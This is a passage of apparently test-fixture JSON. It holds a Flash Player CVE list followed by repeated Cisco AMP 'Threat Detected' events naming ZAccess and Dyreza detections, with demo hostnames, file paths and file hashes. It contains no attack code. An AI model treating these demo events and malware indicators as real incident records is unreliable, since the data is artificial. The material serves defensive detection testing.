Player","version":"11.5.502.146","cve":"CVE-2013-3333","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3333"},{"cve":"CVE-2014-0502","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0502"},{"cve":"CVE-2014-0498","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0498"},{"cve":"CVE-2014-0497","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0497"},{"cve":"CVE-2014-0492","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0492"},{"cve":"CVE-2014-0491","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0491"},{"cve":"CVE-2013-5332","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5332"},{"cve":"CVE-2013-5324","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5324"},{"cve":"CVE-2013-5329","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5329"},{"cve":"CVE-2013-5330","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5330"},{"cve":"CVE-2013-3361","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3361"},{"cve":"CVE-2013-3362","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3362"},{"cve":"CVE-2013-3363","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3363"},{"cve":"CVE-2013-3344","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3344"},{"cve":"CVE-2013-3345","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3345"},{"cve":"CVE-2013-3347","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3347"},{"cve":"CVE-2013-3343","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3343"},{"cve":"CVE-2013-2728","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2728"},{"cve":"CVE-2013-3324","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3324"},{"cve":"CVE-2013-3325","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3325"},{"cve":"CVE-2013-3326","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3326"},{"cve":"CVE-2013-3327","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3327"},{"cve":"CVE-2013-3328","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3328"},{"cve":"CVE-2013-3329","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3329"},{"cve":"CVE-2013-3330","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3330"},{"cve":"CVE-2013-3331","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3331"},{"cve":"CVE-2013-3332","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3332"},{"cve":"CVE-2013-3334","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3334"},{"cve":"CVE-2013-3335","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3335"},{"cve":"CVE-2013-1378","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1378"},{"cve":"CVE-2013-1379","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1379"},{"cve":"CVE-2013-1380","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1380"},{"cve":"CVE-2013-2555","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2555"},{"cve":"CVE-2013-0646","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0646"},{"cve":"CVE-2013-0650","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0650"},{"cve":"CVE-2013-1371","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1371"},{"cve":"CVE-2013-1375","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1375"},{"cve":"CVE-2013-0504","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0504"},{"cve":"CVE-2013-0638","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0638"},{"cve":"CVE-2013-0639","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0639"},{"cve":"CVE-2013-0642","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0642"},{"cve":"CVE-2013-0644","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0644"},{"cve":"CVE-2013-0645","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0645"},{"cve":"CVE-2013-0647","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0647"},{"cve":"CVE-2013-0649","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0649"},{"cve":"CVE-2013-1365","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1365"},{"cve":"CVE-2013-1366","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1366"},{"cve":"CVE-2013-1367","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1367"},{"cve":"CVE-2013-1368","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1368"},{"cve":"CVE-2013-1369","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1369"},{"cve":"CVE-2013-1370","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1370"},{"cve":"CVE-2013-1372","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1372"},{"cve":"CVE-2013-1373","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1373"},{"cve":"CVE-2013-1374","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1374"},{"cve":"CVE-2014-0507","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0507"},{"cve":"CVE-2013-5331","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5331"},{"cve":"CVE-2013-0648","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0648"},{"cve":"CVE-2013-0643","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0643"},{"cve":"CVE-2013-0634","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0634"},{"cve":"CVE-2013-0633","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0633"},{"cve":"CVE-2014-0499","score":7.8,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0499"},{"cve":"CVE-2014-0503","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0503"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364536253907000,"timestamp":1610705149,"timestamp_nanoseconds":228000000,"date":"2021-01-15T10:05:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Backdoor2:ZAccess-tpd","detection_id":"5832364536253906973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"80000000.@","file_path":"\\\\?\\C:\\$Recycle.Bin\\S-1-5-18\\$ff20833dbb78e410a1126d2ca0eecb73\\U\\80000000.@","identity":{"sha256":"9a9de323dc2ba4059c3eb10d20e8b93a4cc44c93ac41a5dfc9572fa1c0d5b1a8","sha1":"f18d87d7c547ed6118b74b2208e592f67b7fca43","md5":"800381acbba0e7bff6cfd0cfd704bf09"},"parent":{"process_id":496,"disposition":"Clean","file_name":"services.exe","identity":{"sha256":"d7bc4ed605b32274b45328fd9914fb0e7b90d869a38f0e6f94fb1bf4e9e2b407","sha1":"54a90c371155985420f455361a5b3ac897e6c96e","md5":"5f1b6a9c35d3d5ca72d6d6fdef9747d6"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255953394991000,"timestamp":1610705129,"timestamp_nanoseconds":942000000,"date":"2021-01-15T10:05:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176255953394991134","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364428879725000,"timestamp":1610705124,"timestamp_nanoseconds":271000000,"date":"2021-01-15T10:05:24+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Kazy:Troj_Generic-tpd","detection_id":"5832364394519986204","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"n","file_path":"\\\\?\\C:\\$Recycle.Bin\\S-1-5-18\\$ff20833dbb78e410a1126d2ca0eecb73\\n","identity":{"sha256":"c9dbfc24f40bc1aa49bd8eac43eb08c26d4587b926f7bacb94cb44a87cdc5600","sha1":"9f9cc367265c8e04747004f4bb122d6084c9bd79","md5":"69bc8b1dcfde7443d80d4b34b45bd193"},"parent":{"process_id":3924,"disposition":"Clean","file_name":"InstallFlashPlayer.exe","identity":{"sha256":"672ec8dceafd429c1a09cfafbc4951968953e2081e0d97243040db16edb24429","sha1":"5c921b125bac24670d2bf27659e100cdf24e7e7f","md5":"2ff9b590342c62748885d459d082295f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255919035253000,"timestamp":1610705121,"timestamp_nanoseconds":628000000,"date":"2021-01-15T10:05:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176255919035252765","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Desktop\\D94038FDE7B0F343931DF8040B\\jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"},"parent":{"process_id":3652,"disposition":"Malicious","file_name":"webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255919035253000,"timestamp":1610705121,"timestamp_nanoseconds":612000000,"date":"2021-01-15T10:05:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176255919035252764","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255919035253000,"timestamp":1610705121,"timestamp_nanoseconds":487000000,"date":"2021-01-15T10:05:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255919035252763","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364411699855000,"timestamp":1610705120,"timestamp_nanoseconds":846000000,"date":"2021-01-15T10:05:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364364455215109","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11938f43-647341ab","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\LocalLow\\Sun\\Java\\Deployment\\cache\\6.0\\3\\11938f43-647341ab","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"},"parent":{"process_id":3428,"disposition":"Clean","file_name":"java.exe","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9","sha1":"69434b7adf90c7f2f53612816366885fcd8e27b3","md5":"4d3663c67b30eedf4a6c8a711e7fe6f9"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364411699855000,"timestamp":1610705120,"timestamp_nanoseconds":839000000,"date":"2021-01-15T10:05:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364364455215107","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"},"parent":{"process_id":3428,"disposition":"Clean","file_name":"java.exe","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9","sha1":"69434b7adf90c7f2f53612816366885fcd8e27b3","md5":"4d3663c67b30eedf4a6c8a711e7fe6f9"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364411699855000,"timestamp":1610705120,"timestamp_nanoseconds":790000000,"date":"2021-01-15T10:05:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364364455215108","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11938f43-647341ab-temp","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\LocalLow\\Sun\\Java\\Deployment\\cache\\6.0\\3\\11938f43-647341ab-temp","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20"},"parent":{"process_id":3428,"disposition":"Clean","file_name":"java.exe","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9","sha1":"69434b7adf90c7f2f53612816366885fcd8e27b3","md5":"4d3663c67b30eedf4a6c8a711e7fe6f9"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364411699855000,"timestamp":1610705120,"timestamp_nanoseconds":783000000,"date":"2021-01-15T10:05:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364364455215106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"},"parent":{"process_id":3428,"disposition":"Clean","file_name":"java.exe","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9","sha1":"69434b7adf90c7f2f53612816366885fcd8e27b3","md5":"4d3663c67b30eedf4a6c8a711e7fe6f9"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364411699855000,"timestamp":1610705120,"timestamp_nanoseconds":767000000,"date":"2021-01-15T10:05:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364364455215105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jar_cache4855455380559478946.tmp","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\jar_cache4855455380559478946.tmp","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20"},"parent":{"process_id":3428,"disposition":"Clean","file_name":"java.exe","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9","sha1":"69434b7adf90c7f2f53612816366885fcd8e27b3","md5":"4d3663c67b30eedf4a6c8a711e7fe6f9"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255906150351000,"timestamp":1610705118,"timestamp_nanoseconds":24000000,"date":"2021-01-15T10:05:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255906150350874","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364381635084000,"timestamp":1610705113,"timestamp_nanoseconds":715000000,"date":"2021-01-15T10:05:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364381635084315","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364381635084000,"timestamp":1610705113,"timestamp_nanoseconds":692000000,"date":"2021-01-15T10:05:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364381635084314","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364381635084000,"timestamp":1610705113,"timestamp_nanoseconds":677000000,"date":"2021-01-15T10:05:13+00:00","event_type":"Threat 